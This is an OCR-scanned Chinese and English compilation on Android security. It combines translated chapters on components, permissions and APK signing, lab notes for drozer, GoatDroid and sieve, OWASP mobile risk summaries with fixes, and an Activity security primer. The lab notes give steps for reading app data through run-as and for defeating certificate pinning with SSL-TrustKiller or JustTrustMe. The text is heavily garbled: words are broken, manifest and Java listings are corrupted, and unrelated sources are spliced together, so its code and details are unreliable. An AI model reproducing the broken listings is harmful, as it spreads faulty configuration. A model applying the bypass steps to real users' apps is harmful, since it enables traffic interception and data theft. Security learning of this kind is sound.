收回 (Boardcast Reciver) 和 内 容 供应 器 (Content Provider) » 将 应 用 分 离 为 组 件 有 助 于 
应 用 的 一 部 分 在 应 用 之 间 重 用 。 


活动 。 活 动 是 用 户 界 面 的 元 素 之 一 。 一 般 来 说 ， 一 个 活动 通常 代表 一 个 界面 。 


服务 。 服 务 是 Android 中 的 后 台 工 作 装 置 。 服 务 可 以 无 限期 运行 。 最 知名 的 服务 示例 是 在 后 
台 播 放 音 乐 的 媒体 播放 器 ， 即 使 用 户 离 开 已 启动 此 服务 的 活动 。 


广播 接收 器 。 广播 接收 器 是 应 用 的 组 件 ， 它 接收 广播 消息 并 根据 所 获得 的 消息 启动 工作 流 。 


内 容 供 应 器 。 内 容 供 应 器 是 为 应 用 提供 存储 和 检索 数据 的 能 力 的 组 件 。 它 还 可 以 与 另 一 应 用 
共享 一 组 数据 。 


因此 ，Android 应 用 由 不 同 的 组 件 组 成 ， 没 有 中 央 入 口 点 ， 不 像 Java 程序 和 main 方法 那 
样 。 由 于 没有 入 口 点 ， 所 有 组 件 (广播 接收 器 除外 ， 它 也 可 以 动态 定义 ) 需要 由 应 用 的 开发 
人 员 在 AndroidManifest.xml 文件 中 声明 。 分 离 成 组 件 使 得 我 们 可 以 在 其 它 应 用 中 使 用 组 件 。 
例如 ， 在 清单 5.1 中 ， 显 示 了 一 个 应 用 的 AndroidManifest.xml 文件 的 示例 。 此 应 用 包含 第 
21 行 中 声明 的 一 个 activity 。 其 他 应 用 可 能 会 调用 此 活动 ， 将 此 组 件 的 功能 集成 到 其 应 用 
中 。 


1 <?xml version="1.0" encoding="utf-8"?> 

2 <manifest xmlns:android="http://schemas.android.com/apk/res/android" 
3 packagez"com.testpackage.testapp" 

4 android: versionCode="1" 

5 android: versionName="1.0" 

6  android:sharedUserId-"com.testpackage.shareduid" 

区 android: sharedUserLabel="@string/sharedUserId" > 

8 


9 «uses-sdk android:minSdkVersion="10" /> 


10 

11 «permission android:name="com.testpackage.permission.mypermission" 
12 android: label="@string/mypermission_string" 

13 android:description="@string/mypermission_descr_string" 

14 android:protectionLevel="dangerous" /> 

15 

16 <uses-permission android:name="android.permission.SEND_SMS"/> 

17 

18 <application 

19 android:icon="@drawable/ic_launcher" 

20 android:label="@string/app_name" > 

21 <activity android:name=".TestActivity" 

22 android:label="@string/app_name" 

23 android:permission-"com.testpackage.permission.mypermission" > 
24 sintent-fdbtern- 

25 «action android:name-"android.intent.action.MAIN" /» 

26 «category android:name-"android.intent.category.LAUNCHER" /» 
27 «/intent-filter» 

28 <intent filters 

29 «action android:name-"com.testpackage.testapp.MY ACTION" /> 
30 «category android:name-"android.intent.category.DEFAULT" /» 
31 </intent filters 

32 </activity> 


33 </application> 
34 </manifest> 


代码 5.1 : AndroidManifest.xml 文件 示例 


Android 提供 了 各 种 方式 来 调用 应 用 的 组 件 。 我 们 可 以 通过 使 用 方 

法 startActivity 和 startActivityForResult 启动 新 的 活动 。 服务 通过 startservice 方法 局 
动 。 在 这 种 情况 下 ， 被 调用 的 服务 调用 其 方法 onstart 。 当 开 发 人 员 要 在 组 件 和 服务 之 间 建 
立 连接 时 ， 它 调用 bindservice 方法 ， 并 在 被 调用 的 服务 中 调用 onBind 方法 。 当 应 用 或 系统 
组 件 使 用 sendBroadcast ， sendorderedBroadcast 和 SendStickyBroadcast 方法 发 送 特殊 消 息 
时 ， 将 启动 广播 接收 器 。 


内 容 供 应 器 由 来 自 内 容 解 析 器 的 请 求 调用 。 所 有 其 他 组 件 类 型 通过 Intent (意图 ) 激活 。 意 
图 是 Android 中 基于 Binder 框架 的 特殊 通信 手段 。 意 图 被 传递 给 执行 组 件 调 用 的 方法 。 被 调 
用 的 组 件 可 以 被 两 种 不 同类 型 的 意图 调用 。 为 了 显示 这 些 类 型 的 差异 ， 让 我 们 考虑 一 个 例 

子 。 例 如 ， 用 户 想 要 在 应 用 中 选择 图 片 。 应 用 的 开发 人 员 可 以 使 用 显 式 意图 或 隐 式 意图 来 调 
用 选择 图 片 的 组 件 。 对 于 第 一 种 意图 类 型 ， 开 发 人 员 可 以 在 他 的 应 用 的 组 件 中 实现 挑选 功 
能 ， 并 使 用 带 有 组 件 名 称 数据 字段 的 显 式 意图 调用 此 组 件 。 当 然 ， 开 发 人 员 可 以 调用 其 他 应 
用 的 组 件 ， 但 是 在 这 种 情况 下 ， 他 必须 确保 该 应 用 安装 在 系统 中 。 一 般 来 说 ， 从 开发 人 员 的 
角度 来 看 ， 一 个 应 用 中 的 组 件 或 不 同 应 用 的 组 件 之 间 的 交互 不 存在 差异 。 对 于 第 二 种 意图 类 
型 ， 开 发 人 员 将 选择 适当 组 件 的 权利 转移 给 操作 系统 。 intent SRE 


其 Action ， Data 和 Category 字段 中 包 包含 一 些 信 息 。 o 根据 这 个 信息 心 ? 使 用 意 图 过 滤器 ， 操作 


系统 选择 可 以 处 理 意图 的 适当 组 件 。 意 图 过 滤器 定义 了 组 件 可 以 处 理 的 意图 的 “模板 "。 当 然 ， 
相同 的 应 用 可 以 定义 一 个 意图 过 滤器 ， 它 将 处 理 来 自 其 他 组 件 的 意图 。 


5.2 应 用 层 的 权限 


权限 不 仅 用 于 保护 对 系统 资源 的 访问 。 第 三 方 应 用 的 开发 人 员 还 可 以 使 用 自 定义 权限 来 保护 
对 其 应 用 的 组 件 的 访问 。 自 定义 权限 声明 的 示例 如 清单 5.1 中 第 11 行 所 示 。 自 定义 权限 的 声 
明 类 似 于 系统 权限 之 一 。 


为 了 说 明 自 定义 权限 的 用 法 ， 请 参考 图 5.1°。 由 3 个 组 件 组 成 的 应 用 2 希望 保护 对 其 中 两 个 的 
访问 : C1 和 C2。 为 了 实现 这 个 目标 ， 应 用 2 的 开发 者 必须 声明 两 个 权限 标签 pl ^ p2 ， 并 
相应 地 将 它们 分 配给 受 保护 的 组 件 。 如 果 应 用 1 的 开发 者 想 要 访问 应 用 2 的 组 件 C1， 则 他 
obe ai 需要 权限 pl 。 在 这 种 情况 下 ， 应 用 1 就 可 以 使 用 应 用 2 的 组 件 C1。 如 果 
应 用 没有 指定 所 需 的 权限 ， 则 禁止 访问 受 此 权限 保护 的 组 件 (参见 图 5.1 中 组 件 C2 的 情 

JL) 。 he 5.1 中 的 AndroidManifest.xml 文件 的 例子 ， 活 动 TestActivity 被 
权限 com.testpackage.permission.mypermission 保护 ， 它 在 同一 个 应 用 清单 文件 中 声 明 。 如 果 
另 一 个 应 用 想 要 使 用 TestActivity 提供 的 功能 ， 它 必须 请 求 使 用 此 权限 ， 类 似 于 第 16 行 中 
的 操作 。 





Application 1 
Uses-permission: Application 2 


p1 








图 5.1 : 保护 第 三 方 应 用 组 件 的 权限 实施 


ActivityManagerService 负责 调用 应 用 的 组 件 。 为 了 保证 应 用 组 件 的 安全 性 ， 在 用 于 调用 组 
件 的 框架 方法 (例如 ，5.1 节 中 描述 的 startactivity ) 中 ， 放 置 特 殊 的 钩子 。 这 些 钩子 检查 
应 用 是 否 有 权 调 用 组 件 。 这 些 检查 以 PackageManagerserver 类 的 checkuidPermission 方法 结 

束 (参见 清单 4.6) 。 因此， 发 生 在 Android 框架 层 的 实际 的 权限 实施 ， 可 以 看 做 Android 
操作 系统 的 受信 任 部 分 。 因此 ， 应 用 不 能 绕 过 检查 。 有 关 如 何 调用 组 件 和 权限 检查 的 更 多 信 


息 ， 请 参见 permissions。 
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第 六 章 Android 安全 的 其 它 话 题 


来 源 : Yury Zhauniarovich | Publications 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


在 本 章 中 ， 我 们 会 涉及 到 与 Android 安全 相关 的 其 他 主题 ， 这 些 主题 不 直接 属于 已 经 涉及 的 
任何 主题 。 


6.1 Android 签名 过 程 


Android 应 用 程序 以 Android 应 用 包 文 件 ( .apk 文件 ) 的 形式 分 发 到 设备 上 。 由 于 这 个 平台 
的 程序 主要 是 用 Java 编写 的 ， 所 以 这 种 格式 与 Java 包 的 格式 -- jar (Java Archive) 有 很 
多 共同 点 ， 它 用 于 将 代码 ， 资 源 和 元 数据 (来 自 可 选 的 META-INF 目录 ) 文件 使 用 zip 归档 算 
法 转换 成 一 个 文件 。 META-INF 目录 存储 软件 包 和 扩展 配置 数据 ， 包 括 安全 性 ， 版 本 控制 
展 和 服务 [5]。 基本 上 ， 在 Android 的 情况 中 ， apkbuilder 工具 将 构建 的 项 目 na 
[1]， 使 用 标准 的 Java 工具 jarsigner 对 这 个 归档 文件 签名 [6]。 在 应 用 程序 签名 过 

中 ， jarsigner 创建 META-INF 目录 ， 在 Android 中 通常 包含 以 下 文件 : 清单 文件 

( MANIFEST.MF ) ， 签 名 文件 (扩展 名 为 .SF ) 和 签名 块 文件 ( .RSA 或 .DSA ) 。 


清单 文件 ( MANIFEST.MF ) 由 主 属性 部 分 和 每 个 条 目 属性 组 成 ， 每 个 包含 在 未 签名 的 apk 中 
文件 拥有 一 个 条 目 。 这些 每 个 条 目 中 的 属性 存储 文件 名 称 信息 ， 以 及 使 用 base64 格式 编码 
的 文件 内 容 摘要 。 在 Android 上 ，SHA1 莫 法 用 于 计算 摘要 。 清单 6.1 中 提供 了 清单 文件 的 
摘录 。 

Manifest-Version : 1.0 

Created-By: 1.6.0 41 (Sun Microsystems Inc. ) 


Name: res/layout/main . xml 
SHA1-Digest : NJiYLN3mBEKTPibVXbFOS8eRCAr8- 


Name: AndroidManifest . xml 
SHA1-Digest : wBoSXxhOQ2LR/pJY7BczuisWLy4- 


ce -4o001i»0nNHB 


代码 6.1 : 清单 文件 的 摘录 


包含 被 签名 数据 的 签名 文件 ( .SF ) 的 内 容 类 似 于 MANIFEST.MF 的 内 容 。 这 个 文件 的 一 个 例 
子 如 清单 6.2 所 示 。 主要 部 分 包含 清单 文件 的 主要 属性 的 摘要 
( SHA1-Digest-Manifest-Main-Attributes ) 和 内 容 摘 要 ( SHA1-Digest-Manifest ) o 每 个 条 


包含 清单 文件 中 的 条 目的 摘要 以 及 相应 的 文件 名 。 


Signature-Version : 1.0 

SHA1-Digest-Manifest-Main-Attributes : nl/DtR972nRpjey6ocvNKvmjvw8- 
Created-By: 1.6.0 41 (Sun Microsystems Inc. ) 

SHA1-Digest-Manifest : Ej5gugx3DYaOLOm3Kh89ddgEJW4- 


Name: res/layout/main.xml 
SHA1-Digest : Z871jZHrhRKHDaGf2KA4p4fKgztk- 


Name: AndroidManifest.xml 
SHA1-Digest : hQtl1Gk+tKFLSXufjNaTwd9qd4Cw= 


FOOANDUHRWNE 


eH 


代码 6.2 : 签名 文件 的 摘录 


最 后 一 部 分 是 签名 块 文件 ( .DsA 或 .RSA ) 。 这 个 二 进 制 文件 包含 签名 文件 的 签名 版 本 ; 它 
与 相应 的 .sF 文件 具有 相同 的 名 称 。 根据 所 使 用 的 算法 (RSA 或 DSA) ， 它 有 不 同 的 扩展 
AZ o 


相同 的 apk 文 件 有 可 能 签署 几 个 不 同 的 证 书 。 在 这 种 情况 下 ， 在 META-INF 目录 中 将 有 几 
个 .SF 和 osa 或 ,RSA 文件 (它们 的 数量 将 等 于 应 用 程序 签名 的 次 数 ) © 


6.1.1 Android 中 的 应 用 签名 检查 


大 多 数 Android 应 用 程序 都 使 用 开发 人 员 签 名 的 证 书 (注意 Android 的 "证 书 " 和 "签名 "可 以 互 
换 使 用 ) 。 此 证 书 用 于 确保 原始 应 用 程序 的 代码 及 其 更 新 来 自 同一 位 置 ， 并 在 同一 开发 人 员 
的 应 用 程序 之 间 建 立信 任 关 系 。 为 了 执行 这 个 检查 ，Android 只 是 比较 证 书 的 二 进 制 表示 ， 
它 用 于 签署 一 个 应 用 程序 及 其 更 新 (第 一 种 情况 ) 和 协作 应 用 程序 (第 二 种 情况 ) © 


这 种 对 证 书 的 检查 通过 PackageManagerService 中 的 方 

法 int compareSignatures(Signature[] s1，Signature[] s2) 来 实现 ， 代码 如 清单 6.3 所 示 。 在 
上 一 节 中 ， 我 们 注意 到 在 Android 中 ， 可 以 使 用 多 个 不 同 的 证 书签 署 相同 的 应 用 程序 。 这 解 
释 了 为 什么 该 方法 使 用 两 个 签名 数组 作为 参数 。 尽 管 该 方法 在 Android 安全 规定 中 占有 重要 
地 位 ， 但 其 行为 强烈 依赖 于 平台 的 版 本 。 在 较 新 版 本 中 (从 Android 2.2 开始 ) ， 此 方法 比较 
两 个 signature 数组 ， 如 果 两 个 数组 不 等 于 null ， 并 且 如 果 所 有 s2 签名 都 包含 在 st 中， 
则 返回 SIGNATURE MATCH 值 ， 否 则 为 srGNATURE NOT MATCH 。 在 版 本 2.2 之 前 ， 此 方法 检查 数 
组 si 是 否 包 含 在 s2 中 。 这 种 行为 允许 系统 安装 升级 ， 即 使 它们 已 经 使 用 原始 应 用 程序 的 证 
书 子 集 签名 [2] 。 


在 几 种 情况 下 ， 需 要 同一 开发 人 员 的 应 用 程序 之 间 的 信任 关系 。 第 一 种 情况 
与 signature 和 signatureorsystem 的 权限 相关 。 要 使 用 受 这 些 权 限 保 护 的 功能 ， 声 明 权 限 和 
请 求 它 的 包 必 须 使 用 同一 组 证 书签 名 。 第 二 种 情况 与 Android 运行 具有 相同 UID 或 甚至 在 相 
同 Linux 进程 中 运行 不 同 应 用 程序 的 能 力 有 关 。 在 这 种 情况 下 ， 请 求 此 类 行为 的 应 用 程序 必 
须 使 用 相同 的 签名 进行 签名 。 


static int compareSignatures ( Signature[] si , Signature[] s2 ) { 
if ( s1 == null) ( 
return s2 == null 
? PackageManager.SIGNATURE NEITHER SIGNED 
PackageManager.SIGNATURE FIRST NOT SIGNED; 


} 
if ( s2 == null ) { 
return PackageManager .SIGNATURE_SECOND_NOT_SIGNED; 


OANDOBRWNHE 


10 HashSet<Signature> seti = new HashSet<Signature>() ; 
qt for ( Signature sig : s1 ) { 
12 seti.add( sig ) ; 


14 HashSet«Signature» set2 = new HashSet<Signature>() ; 
15 for ( Signature sig : S2 ) { 

16 set2.add( sig ) ; 

17} 

18 // Make sure s2 contains all signatures in s1 

19 if ( seti.equals ( set2 ) ) { 


20 return PackageManager.SIGNATURE MATCH; 
23! } 

22 return PackageManager .SIGNATURE_NO_MATCH; 
23 


代码 6.3 : PackageManagerService 中 的 comparesignatures 方法 


Android 应 用 安全 


最 近 想 扩展 学 习 下 Android 应 用 安全 ， 找 到 一 份 入 门 指引 ， 大 概 走 了 一 遍 ， 有 一 些 注意 的 点 
且 记 下 。 


1. 


建议 下 载 的 Appie 版 本 为 2.0， 因 为 作者 写 这 些 文章 时 用 的 是 2.0 版 本 ， 亲 试 使 用 3.1 版 本 
时 goat droid 等 app 的 db 都 是 损坏 的 。 如 果 在 cmd 内 goatdroid 执行 不 了 ， 可 以 找到 
jar 文件 并 java -jar xx.jar 启动 它 


在 drozer 启动 时 出 现 找 不 到 java 的 错误 ， 可 以 在 用 户 家 目录 如 C:\Users\stmba 下 建立 
.drozer_config 文件 ， 内 容 如 下 : 


[executables ] 

java = D:\Java\jdk1.8.0_91\bin\java.exe 
[executables ] 

javac = D:\Java\jdk1.8.0_91\bin\javac.exe 


cd drozer 所 在 目录 (如 D:\AppieWAppie\vendor\drozer) 再 执行 drozer console connect, 
否则 执行 命令 list 可 能 提示 没有 module， 对 某 个 module 使 用 时 run app.package.info 一 
help 


使 用 virtualbox 启动 genymotion avd 时 ， 设 置 network 为 adaptor1 为 host-only (允许 全 
部 访问 ) ， 在 全 局 config 建立 一 个 nat 网 络 ， 将 network adaptor2 设置 为 nat ; 若 宿 主机 
还 需要 使 用 代理 才能 访问 网 络 ， 则 在 avd wifi 中 也 需要 长 按 设置 下 代理 (或 者 为 
burpsuite ) 


在 使 用 adb 安装 一 些 apk 到 avd 时 提示 arm_abi 冲突 ， 需 要 安装 下 genymotion-arm- 
translation_v1.1.zip， 下 载 后 将 其 拖 动 到 avd 界面 安装 即 可 


在 登录 goatdroid ` herd financial 等 app 时 需要 设置 下 server ip port PP 宿主 机 的 ip * 
port 默认 是 9888。 如 果 不 知 道 用 户 名 密码 则 在 goatdroid service 界面 找 下 db 所 在 ， 查 
询 下 已 有 用 户 名 和 密码 ， 一 般 有 个 默认 用 户 goatdroid : goatdroid 


第 12 章 中 说 可 以 绕 过 登录 页 面 直 接 启 动 intent-filter 出 来 的 主页 ， 但 貌似 用 户主 页 是 在 
activities.Home， 此 activity 外 部 调用 不 了 


安装 Genymotion 时 最 好 用 打包 virtualbox 的 版 本 ，settings 设置 下 代理 网 络 (如 果 需 
要 ) ， 设 置 下 sdk 地 址 (FP appie2 目录 下 某 位 置 ， 如 D:\Appie2\Appie\bin\adt\sdk) 


cmd 中 adb devices 启动 时 如 果 报 错 端 口 占用 ， 可 能 是 还 有 另外 一 份 sdk (上 比如 android 
studio) 并 开启 了 adb ° 


单独 使 用 SDK Manager 时 需要 设置 下 代理 。 使 用 android studio 时 设置 auto detect 
proxy 让 其 找到 pac 文件 即 可 ， 但 编译 时 需 要 设置 下 Gradle 的 代理 ， 在 
gradle.properties 文件 中 配置 


10. 


11. 


12. 


systemProp.https.proxyHost=proxy.example.com 
systemProp.http.proxyHost=proxy.example.com 
systemProp.https.proxyPort-8080 
systemProp.http.proxyPort-8080 


测试 android 应 用 安全 常用 工具 

adb (adb devices | adb shell | adb install | adb uninstall | adb push | adb pull | adb 
forward | adb shell am[activityManager] | adb shell pm[packageManager]) 

drozer (模拟 一 个 app 的 方式 与 其 他 app 交互 ，adb forward tcp:31415 tcp:31415 ) 
That means for these tasks we won't be needing a rooted device, and neither drozer 
need rooted device to run. All the attacks we will do from drozer console will be 
originated from drozer app to testing application on your device. So it is like attacking 
your Banking application installed on your phone from a malicious application also 
installed on the same device. 

apktool ( 反 编 译 apk 成 smali 文件 等 ) 

dex2jar (将 apk 文件 反 编 译 成 jar 文件 ， 即 class 文件 集合 ) 

jdgui (把 jar 文件 反 编 译 成 java 源 文件 ) 


android:debuggable 

Look for android:debuggable value in the AndroidManifest.xml file. 

In order to figure out which PID belong to our application, type adb jdwp before running 
the application you wanted to test. 

Now with the help of run-as binary we can execute commands as 
com.mwr.example.sieve application 


adb shell 


-as com.mwr.example.sieve 





Now you can extract the data or run an arbitary code using application permission like 
shown below. 





android:allowBackup 

allowBackup 风险 位 置 : AndroidMannifest.xml 文件 android:allowBackup 属性 
allowBackup 风险 触发 前 提 条 件 : 未 将 AndroidMannifest.xml 文件 中 的 
android:allowBackup 属性 值 设 为 false 

allowBackup 风险 原理 : 3 allowBackup 标志 值 为 true 时 ， 即 可 通过 adb backup 和 
adb restore 来 备份 和 恢复 应 用 程序 数据 


13. 开发 者 后 门 
There are sometimes when developer put a backdoorto a particular application. He/She 
puts that because he doesn’t want somebody else to access that sensitive piece of 
Information and sometimes that backdoor is for debugging purposes. 
通过 反 编 译 成 java WRA > BAHL activity 也 许可 以 发 现 一 些 登 录 的 后 门 。 


— » Weak Server Side Controls 


客户 端 app VA api 形式 请 求 server 端 服务 ，server 端的 一 些 缺 陷 逻 辑 导 致 的 漏洞 ， 类 似 传统 
的 owasp web top 10 ° 

how to fix 

Secure coding and configuration practices must be used on server-side of the mobile 
application. 


— ^ Insecure Data Storage 


Internal Storage 


不 要 对 shared_prefs 目录 下 的 文件 使 用 MODE_WORLD_READBALE & 
MODE_WORLD_WRITABLE 模式 ， 如 果 要 共享 数据 给 其 他 app 读 取 ， 可 以 使 用 content 
pre zm PLACER ERN 





External Storage 


保存 在 sd card 的 文件 都 是 全 局 可 读 写 的 ， 所 以 不 要 存储 一 些 敏感 数据 。 建 议 不 要 从 外 部 存储 
中 加 载 class 等 可 执行 文件 ， 需 要 对 读 取 的 文件 加 以 验证 ， 比 如 签名 鉴定 等 。 


content provider 


见 Android content provider 


= » Insufficient Transport Layer Protection 


Common Scenarios 


e Lack of Certificate Inspection: Android Application fails to verify the identity of the 
certificate presented to it. Most of the application ignore the warnings and accept any 


self-signed certificate presented. Some Application instead pass the traffic through an 
HTTP connection. 

e Weak Handshake Negotiation: Application and server perform an SSL/TLS 
handshake but use an insecure cipher suite which is vulnerable to MITM attacks. So 
any attacker can easily decrypt that connection. 

e Privacy Information Leakage: Most of the times it happens that Applications do 
authentication through a secure channel but rest all connection through non-secure 
channel. That doesn’t add to security of application because rest sensitive data like 
session cookie or user data can be intercepted by an malicious user. 


What is certificate Pinning? 


By default, when making an SSL connection, the client(android app) checks that the server’s 
certificate has a verifiable chain of trust back to a trusted (root) certificate and matches the 
requested hostname. This lead to problem of Man in the Middle Attacks(MITM). 

In certificate Pinnning, an Android Application itself contains the certificate of server and only 
transmit data if the same certificate is presented. 


e There are some rare application which uses custom protocols instead of HTTP/HTTPS 
to transmit data. Either because of requirement or because to prevent interception 
through common techniques. 

e There are some ultra rare application’s which also encrpyts data before placing data in 
HTTP Request Body, which ultimately then passed through an SSL connection to the 
server. 


4« Rapp 做 了 certificate Pinning 验证 ， 那 么 即使 手机 在 安装 了 burpsuite 的 ca 证 书 的 情况 
下 ， 也 不 能 拦截 到 https 请 求 。 


We will install Android SSL-Trust-Killer application in the android device which will bypass 
SSL Certificate Pinning for nearly all application. 


Make Sure Cydia Substrate is installed on the device/emulator. 


e Download Android SSL-Trust-killer from here. 

e Install using adb install Android-SSL-TrustKiller.apk 

e Restart the device/emulator using Cydia Substrate. Now if you try to intercept then you 
can see most of traffic from nearly every app in BurpSuite . 


Most of the android security professionals uses Cydia Substrate and Android-SSL-TrustKiller 
for intercepting traffic but as Cydia Substrate is not supported after Android 4.2.2 , it may be 
a problem to some users who want to pentest app which only works on Kitkat(Android 4.4.4) 
or Lollipop(Android 5.0.0) . 


So i will be using a Xposed Framework and JustTrustMe which is an xposed framework 
module. 


e First download Xposed Installer apk from here and install on your device. 

e Now download JustTrustMe apk from here and install it on your device. 

e Then open up your Xposed Installer App from your device and open modules in it. Then 
click on the checkbox to activate that module. 


w `~ Unintended Data Leakage 


Logging 


Pidcat is a modified version of logcat with better viewing of logs. 





Copy/Paste Buffer Caching 


Android provides clipboard-based framework to provide copy-paste function in android 
applications. But this creates serious issue when some other application can access the 
clipboard which contain some sensitive data. 

How To Fix 

Disable copy/paste function for sensitive part of the application. For example, disable 
copying credit card details. 


Crash Logs 


If an application crashes during runtime and it saves logs somewhere then those logs can be 
of help to an attacker especially in cases when android application cannot be reverse 
engineered. 

How To Fix 

Avoid creating logs when applications crashes and if logs are sent over the network then 
ensure that they are sent over an SSL channel. 


Analytics Data Sent To 3rd Parties 


Most of the application uses other services in their application like Google Adsense but 
sometimes they leak some sensitive data or the data which is not required to sent to that 
service. This may happen because of the developer not implementing feature properly. 


You can look by intercepting the traffic of the application and see whether any sensitive data 
is sent to 3rd parties or not. 


4. ` Poor Authentication And Authorization 


一 人 


. JA shexport 出 来 的 activity， 可 以 直接 登录 到 用 户 首 页 ， 绕 过 了 登录 过 程 。 

. 输入 不 存在 的 用 户 名 会 提示 不 存在 ， 输 入 存在 的 用 户 名 会 提示 已 注册 ， 可 以 用 于 爆破 
(如 果 后 端 server 逮 辑 没 有 做 频率 限制 ) 。 

3. 更 换 userid 等 可 以 任意 登录 其 他 人 帐号 。 

4， 返 回 内 容 泄露 设备 deviceid 等 。 


N 


zx ^ Broken Cryptography 


So according to OWASP below are the scenarios which can occur in an application 


e Poor Key Management Processes The best encryption doesn’t matter when you do not 
handle keys properly.Below are some scenarios which are common in Application 
building:- Including the keys in the same attacker-readable directory as the encrypted 
content Making the keys otherwise available to the attacker Avoid the use of hardcoded 
keys within your binary 

e Creation and Use of Custom Encryption Protocols ^ There is a Awesome library 
Conceal which was developed by Facebook suitable for Applications wanted to Encrypt 
large files in an efficient manner. 

e Use of Insecure and/or Depcreated algorithms. Some of the them are listed below: 

RC4 
MD4 
MD5 
SHA1 


t ` Client Side Injections 


e Javascript Injection: The mobile browser is vulnerable to javascript injection as well. 
Android default Browser has also access to mobile applications cookies. If you have 
your Google account attached to device then you can use your Google account in 


Android Browser without authentication. 


e Several application interfaces or language functions can accept data and can be fuzzed 
to make applications crash. While most of these flaws do not lead to overflows because 
of the phone’s platforms being managed code, there have been several that have been 
used as a "userland" exploit in an exploit chain aimed at rooting or jailbreaking devices. 


e Mobile malware or other malicious apps may perform a binary attack against the 
presentation layer (HTML, JavaScript, Cascading Style Sheets ) or the actual binary of 
the mobile app’s executable. These code injections are executed either by the mobile 
app’s framework or the binary itself at run-time. 


How To Fix 


e SQL Injection: When dealing with dynamic queries or Content-Providers ensure you 
are using parameterized queries. 

e JavaScript Injection(XSS): Verify that JavaScript and Plugin support is disabled for 
any WebViews (usually the default). 

* LocalFile Inclusion: Verify that File System Access is disabled for any WebViews 
( webview.getSettings().setAllowFileAccess(false); ). 

e Intent Injection/Fuzzing: Verify actions and data are validated via an Intent Filter for all 
Activities. 


^. ^ Security Decisions via Untrusted Input 


If any of the component is public then it can accessed from another application installed on 
the same device. In Android a activity/services/content provider/broadcast receiver is public 
when exported is set to true but a component is also public if the manifest specifies an Intent 
filter for it. 

However,developers can explicitly make components private (regardless of any intent filters) 
by setting the "exported" attribute to false for each component in the manifest file. 
Developers can also set the "permission" attribute to require a certain permission to access 
each component, thereby restricting access to the component. 


Android content provider 
Android activity 

Android broadcast 
Android services 


Ju ^ Improper Session Handling 


Session handling is very important part after authentication has been done. Session 
Management should also be done in secure way to prevent some vulnerable sceanarios. 
Most of the application have secure mechanism for authentication but very insecure 
mechanisms for session handling, below i will be describing some of the common scenarios. 


No session destruction at server side 


| have seen this one most of the times, most of the applications just send a null cookie when 
user opt for logout but still that session cookie is valid on server side and is not destroyed 
after user opted for logout feature. 


Cookie not set as Secure 


The secure flag is an option that can be set by the application server when sending a new 
cookie to the user within an HTTP Response. The purpose of the secure flag is to prevent 
cookies from being observed by unauthorized parties due to the transmission of a the cookie 
in clear text. 


To accomplish this goal, browsers which support the secure flag will only send cookies with 
the secure flag when the request is going to a HTTPS page. Said in another way, the 
browser will not send a cookie with the secure flag set over an unencrypted HTTP request. 


T » Binary Protections 


可 以 使 用 dex2jar、jdgui 反 编 译 java 源 代码 。 

Application Code can be obfuscated with the help of Proguard but it is only able to slow 
down the adversary from reverse engineering android application, obfuscation doesnt 
prevent reverse engineering. You can learn more about proguard here. 


For security conscious application’s application, Dexguard can be used. Dexguard is a 
commercial version of Proguard. Besides encrypting classes, strings, native libraries, it also 
adds tamper detection to let your application react accordingly if a hacker has tried to modify 
it or is accessing it illegitimately. 


原文 by RZA 


0x00 科普 


Android 每 一 个 Application Af Æ & Activity » Service ` content Provider 和 Broadcast Receiver 
= Android 的 基本 组 件 所 组 成 ， 其 中 Activity 是 实现 应 用 程序 的 主体 ， 它 承担 了 大 量 的 显示 和 
交互 工作 ， 其 至 可 以 理解 为 一 个 "界面 "就 是 一 个 Activity。 Activity 是 为 用 户 操 作 而 展示 的 可 视 
化 用 户 界 面 ， 比 如 说 ， 一 个 activity 可 以 展示 一 个 菜单 项 列表 供用 户 选择 ， 或 者 显示 一 些 包 含 

说 明 的 照片 。 


一 个 短 消 息 应 用 程序 可 以 包括 一 个 用 于 显示 作为 发 送 对 象 的 联系 人 的 列表 的 activity， 一 个 给 
选 定 的 联系 人 写 短信 的 activity 以 及 翻阅 以 前 的 短信 和 改变 设置 的 activity ° 


尽管 它们 一 起 组 成 了 一 个 内 聚 的 用 户 界面 ， 但 其 中 每 个 activity 都 与 其 它 的 保持 独立 ， 每 个 都 
是 以 Activity 类 为 基 类 的 子 类 实现 。 

一 个 应 用 程序 可 以 只 有 一 个 activity， 或 如 刚才 提 到 的 短信 应 用 程序 那样 ， 包 含 很 多 个 。 每 个 
activity 的 作用 ， 以 及 其 数目 ， 自 然 取决 于 应 用 程序 及 其 设计 。 


一 般 情 况 下 ， 总 有 一 个 应 用 程序 被 标记 为 用 户 在 应 用 程序 启动 的 时 候 第 一 个 看 到 的 ， 从 一 个 
activity 转向 另 一 个 的 方式 是 靠 当前 的 activity 启动 下 一 个 。 


0x01 知识 要 点 


参考 : http://developer.android.com/guide/components/activities.html 


生命 周期 


Android Activity Security 






































onCreate() 
ME A——————— onRestart() 
User navigates | 
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Another activity comes 
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User returns 
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Apps with higher priority J 
need memory | zig | 
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onStop() I L— ——————À 
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being destroyed by the system 
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onDestroy() 
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启动 方式 
显 式 启动 
配置 文件 中 注册 组 件 


<activity android:name=".ExampleActivity" android:icon="@drawable/app_icon"> 
<intent-filter> 

<action android:name="android.intent.action.MAIN" /> 

<category android:name="android.intent.category.LAUNCHER" /> 
</intent-filter> 
</activity> 
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android.intent.action.MAIN 表明 这 个 activity 是 程序 的 主 


activity > android.intent.category.LAUNCHER 表示 这 个 activity 可 以 通过 LAUNCHER 来 启动 


直接 使 用 intent 对 象 指 定 application 以 及 activity 启动 


Intent intent = new Intent(this, ExampleActivity.class); 
startActivity(intent); 


未 配置 intent-filter 的 action 属 性 ，activity 只 能 使 用 显 式 启动 ， 私 有 Activity 推 荐 使 用 显 式 启 
隐 式 启动 


Intent intent = new Intent(Intent.ACTION_SEND); 
intent.putExtra(Intent.EXTRA_EMAIL, recipientArray); 
startActivity(intent); 


隐 式 调用 就 是 没有 明确 的 指出 组 件 信 息 ， 而 是 通过 Filter 去 过 滤 出 需要 的 组 件 。 


Intent intent = new Intent(); 
intent.setAction(Intent.ACTION BATTERY LOW); 
intent.addCategory(Intent.CATEGORY APP EMAIL); 
intent.setDataAndType(Uri.EMPTY, "video/mpeg"); 
startActivity(intent); 


这 里 就 是 一 个 隐 式 的 调用 ， 可 以 看 到 我 为 Intent 设 置 了 三 个 属性 Action、Category、Data (还 


有 ComponentName、Type、Extras( 一 般 用 于 传递 参数 ) 、Flags) 。 


p 就 会 根据 我 们 设置 的 这 三 个 属性 去 第 选 合适 的 组 件 来 打开 ， 也 就 是 因 


